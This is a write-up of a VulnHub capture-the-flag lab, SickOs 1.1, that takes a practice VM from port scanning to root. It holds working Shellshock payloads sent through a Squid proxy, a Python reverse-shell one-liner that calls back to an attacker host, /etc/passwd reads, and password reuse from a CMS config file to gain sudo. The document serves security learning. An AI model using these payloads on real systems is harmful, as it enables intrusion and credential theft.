SickOs: 1.1 VulnHub Writeup

  1. Service discovery
  2. Port 80
  3. Time to snoop
  4. sickos
  5. Conclusion

Another Friday, another VM. This time it's SickOS 1.1 by D4rk. The machine description makes mention to OSCP - as I'll be taking this certification in January, I jumped at the chance to give this VM a spin.

First of all, I had to convert the disk to a VDI in order to use it in VirtualBox.

$ VBoxManage clonehd --format VDI SickOs1.1-disk1.vmdk SickOs1.1-disk1.vdi

Once I'd done this, I created a 64bit Linux VM with 512mb of ram, and then mounted the disk image.

Service discovery

First things first, I run nmap on the target. The target doesn't respond to pings, so I skip that check.

$ nmap -p 1-65535 -T5 -A -v -sT 192.168.57.101

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-11 11:51 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating Ping Scan at 11:51
Scanning 192.168.57.101 [2 ports]
Completed Ping Scan at 11:51, 1.50s elapsed (1 total hosts)
Nmap scan report for 192.168.57.101 [host down]
NSE: Script Post-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.95 seconds
test@test-VirtualBox:~$ nmap -p 1-65535 -T5 -A -v -sT -Pn 192.168.57.101

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-11 11:51 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:51
Completed Parallel DNS resolution of 1 host. at 11:51, 0.02s elapsed
Initiating Connect Scan at 11:51
Scanning 192.168.57.101 [65535 ports]
Discovered open port 22/tcp on 192.168.57.101
Discovered open port 3128/tcp on 192.168.57.101
Completed Connect Scan at 11:52, 53.73s elapsed (65535 total ports)
Initiating Service scan at 11:52
Scanning 2 services on 192.168.57.101
Completed Service scan at 11:52, 11.03s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.57.101.
Initiating NSE at 11:52
Completed NSE at 11:52, 20.20s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Nmap scan report for 192.168.57.101
Host is up (0.00091s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.57 seconds

So we've got an SSH Server, and a squid proxy.

There is no banner on the SSH server, so I move on to check out the squid proxy.

Using nmaps proxy options, I perform a limited scan on localhost via the proxy.

$ nmap --proxy http://192.168.57.101 -T5 -A -v -sT -Pn 127.0.0.1

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-11 12:16 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Initiating Connect Scan at 12:16
Scanning localhost (127.0.0.1) [1000 ports]
Discovered open port 22/tcp on 127.0.0.1
Discovered open port 80/tcp on 127.0.0.1
Discovered open port 631/tcp on 127.0.0.1
Discovered open port 5432/tcp on 127.0.0.1
Completed Connect Scan at 12:16, 0.01s elapsed (1000 total ports)
Initiating Service scan at 12:16
Scanning 4 services on localhost (127.0.0.1)
Completed Service scan at 12:16, 0.00s elapsed (4 services on 1 host)
NSE: Script scanning 127.0.0.1.
Initiating NSE at 12:16
Completed NSE at 12:16, 5.38s elapsed
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000038s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  tcpwrapped
80/tcp   open  tcpwrapped
|_xmlrpc-methods: ERROR: Script execution failed (use -d to debug)
631/tcp  open  tcpwrapped
|_xmlrpc-methods: ERROR: Script execution failed (use -d to debug)
5432/tcp open  tcpwrapped

NSE: Script Post-scanning.
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.02 seconds

We've got a few new ports to check out - 80, 631 and 5432.

Port 80

After setting up ZAP to use port 8123 on the target as a proxy, I visit '127.0.0.1' in my browser. We receive the following response back.

HTTP/1.0 200 OK
Date: Fri, 11 Dec 2015 12:30:24 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.21
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html
X-Cache: MISS from localhost
X-Cache-Lookup: MISS from localhost:3128
Via: 1.0 localhost (squid/3.1.19)
Connection: keep-alive


<h1>
BLEHHH!!!
</h1>

I fire off forced browse, and wait to see what comes back.

In the robots.txt, we get a single interesting hit.

User-agent: *
Disallow: /
Dissalow: /wolfcms

I'll note this for later, in case we run out of steam.

Another interesting result came back from the forced browse - '/cgi-bin/status'. This gave me what appears to be the output of a few bash commands, converted to JSON format.

{ "uptime": " 18:09:36 up 49 min, 0 users, load average: 0.54, 0.30, 0.14", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}

Immediately, I test for shellshock on the target.

$ wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=yes -e http_proxy=192.168.57.101:3128 http://127.0.0.1/cgi-bin/status

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

Beautiful - time to get a reverse shell.

$ wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.57.102\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' 2>&1" -e use_proxy=yes -e http_proxy=192.168.57.101:3128 http://127.0.0.1/cgi-bin/status

In another tab, I started netcat listening on port 1234. We get our connect back!

$ nc -lv 0.0.0.0 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from [192.168.57.101] port 1234 [tcp/*] accepted (family 2, sport 43799)
/bin/sh: 0: can't access tty; job control turned off
$ uid=33(www-data) gid=33(www-data) groups=33(www-data)

Time to snoop

I browse to the web root, and perform a file listing.

$ cd /var/www
$ ls -lah
total 24K
drwxrwxrwx  3 root root 4.0K Dec  6 21:15 .
drwxr-xr-x 13 root root 4.0K Dec 11 17:19 ..
-rwxrwxrwx  1 root root  109 Dec  5 07:57 connect.py
-rw-r--r--  1 root root   21 Dec  5 06:05 index.php
-rw-r--r--  1 root root   45 Dec  5 06:05 robots.txt
drwxr-xr-x  5 root root 4.0K Dec  5 06:33 wolfcms

So we've got an installation of something called Wolf CMS.

$ cd wolfcms
$ ls -alh
total 52K
drwxr-xr-x 5 root root 4.0K Dec  5 06:33 .
drwxrwxrwx 3 root root 4.0K Dec  6 21:15 ..
-rwxr-xr-x 1 root root  950 Dec  5 06:15 .htaccess
-rwxrwxrwx 1 root root 4.0K Dec  5 06:15 CONTRIBUTING.md
-rwxrwxrwx 1 root root 2.4K Dec  5 06:15 README.md
-rwxrwxrwx 1 root root  403 Dec  5 06:15 composer.json
-rwxrwxrwx 1 root root 3.0K Dec  5 07:26 config.php
drwxrwxrwx 2 root root 4.0K Dec  5 06:15 docs
-rwxrwxrwx 1 root root  894 Dec  5 06:15 favicon.ico
-rwxrwxrwx 1 root root 6.7K Dec  5 06:32 index.php
drwxrwxrwx 4 root root 4.0K Dec  6 21:16 public
-rwxrwxrwx 1 root root    0 Dec  5 06:15 robots.txt
drwxrwxrwx 7 root root 4.0K Dec  5 06:25 wolf

Within the wolfcms directory, there's a config.php file.

$ cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);

// The number of seconds before the check for a new Wolf version times out in case of problems.
define('CHECK_TIMEOUT', 3);

// The full URL of your Wolf CMS install
define('URL_PUBLIC', '/wolfcms/');

// Use httpS for the backend?
// Before enabling this, please make sure you have a working HTTP+SSL installation.
define('USE_HTTPS', false);

// Use HTTP ONLY setting for the Wolf CMS authentication cookie?
// This requests browsers to make the cookie only available through HTTP, so not javascript for example.
// Defaults to false for backwards compatibility.
define('COOKIE_HTTP_ONLY', false);

// The virtual directory name for your Wolf CMS administration section.
define('ADMIN_DIR', 'admin');

// Change this setting to enable mod_rewrite. Set to "true" to remove the "?" in the URL.
// To enable mod_rewrite, you must also change the name of "_.htaccess" in your
// Wolf CMS root directory to ".htaccess"
define('USE_MOD_REWRITE', false);

// Add a suffix to pages (simluating static pages '.html')
define('URL_SUFFIX', '.html');

// Set the timezone of your choice.
// Go here for more information on the available timezones:
// http://php.net/timezones
define('DEFAULT_TIMEZONE', 'Asia/Calcutta');

// Use poormans cron solution instead of real one.
// Only use if cron is truly not available, this works better in terms of timing
// if you have a lot of traffic.
define('USE_POORMANSCRON', false);

// Rough interval in seconds at which poormans cron should trigger.
// No traffic == no poormans cron run.
define('POORMANSCRON_INTERVAL', 3600);

// How long should the browser remember logged in user?
// This relates to Login screen "Remember me for xxx time" checkbox at Backend Login screen
// Default: 1800 (30 minutes)
define ('COOKIE_LIFE', 1800);  // 30 minutes

// Can registered users login to backend using their email address?
// Default: false
define ('ALLOW_LOGIN_WITH_EMAIL', false);

// Should Wolf CMS block login ability on invalid password provided?
// Default: true
define ('DELAY_ON_INVALID_LOGIN', true);

// How long should the login blockade last?
// Default: 30 seconds
define ('DELAY_ONCE_EVERY', 30); // 30 seconds

// First delay starts after Nth failed login attempt
// Default: 3
define ('DELAY_FIRST_AFTER', 3);

// Secure token expiry time (prevents CSRF attacks, etc.)
// If backend user does nothing for this time (eg. click some link)
// his token will expire with appropriate notification
// Default: 900 (15 minutes)
define ('SECURE_TOKEN_EXPIRY', 900);  // 15 minutes

In order to facilitate access, I transfer the trust b374k PHP shell to the target. From here, I use the above details to connect to mysql.

First of all, I check the mysql.user tables. There is another user in there named 'sickos' with the same hash. On a hunch, I try to su to the 'sickos' user with this password.

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su sickos
su sickos
Password: john@123

sickos@SickOs:~$ id
id
uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
sickos@SickOs:~$

sickos

Now that we're the sickos user, and I can see that the user is part of the sudo group, I double check their permissions.

sickos@SickOs:~$ sudo -l
sudo -l
[sudo] password for sickos: john@123

Matching Defaults entries for sickos on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL

Awesome - time to get our flag!

sickos@SickOs:~$ sudo su
sudo su
root@SickOs:/home/sickos# cd /root
cd /root
root@SickOs:~# ls -alh
ls -alh
total 40K
drwx------  3 root root 4.0K Dec  6 21:14 .
drwxr-xr-x 22 root root 4.0K Sep 22 08:13 ..
-rw-r--r--  1 root root   96 Dec  6 07:27 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3.7K Dec  6 21:18 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  2 root root 4.0K Sep 22 08:33 .cache
-rw-------  1 root root   22 Dec  5 06:24 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 5.2K Dec  6 21:14 .viminfo
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

Conclusion

I'm not sure whether shellshock was the intended path here. The fact that I didn't even touch the WolfCMS instance feels a bit off, but hey, we got root and our flag.

Thanks for the fun VM D4rk, and thank you VulnHub!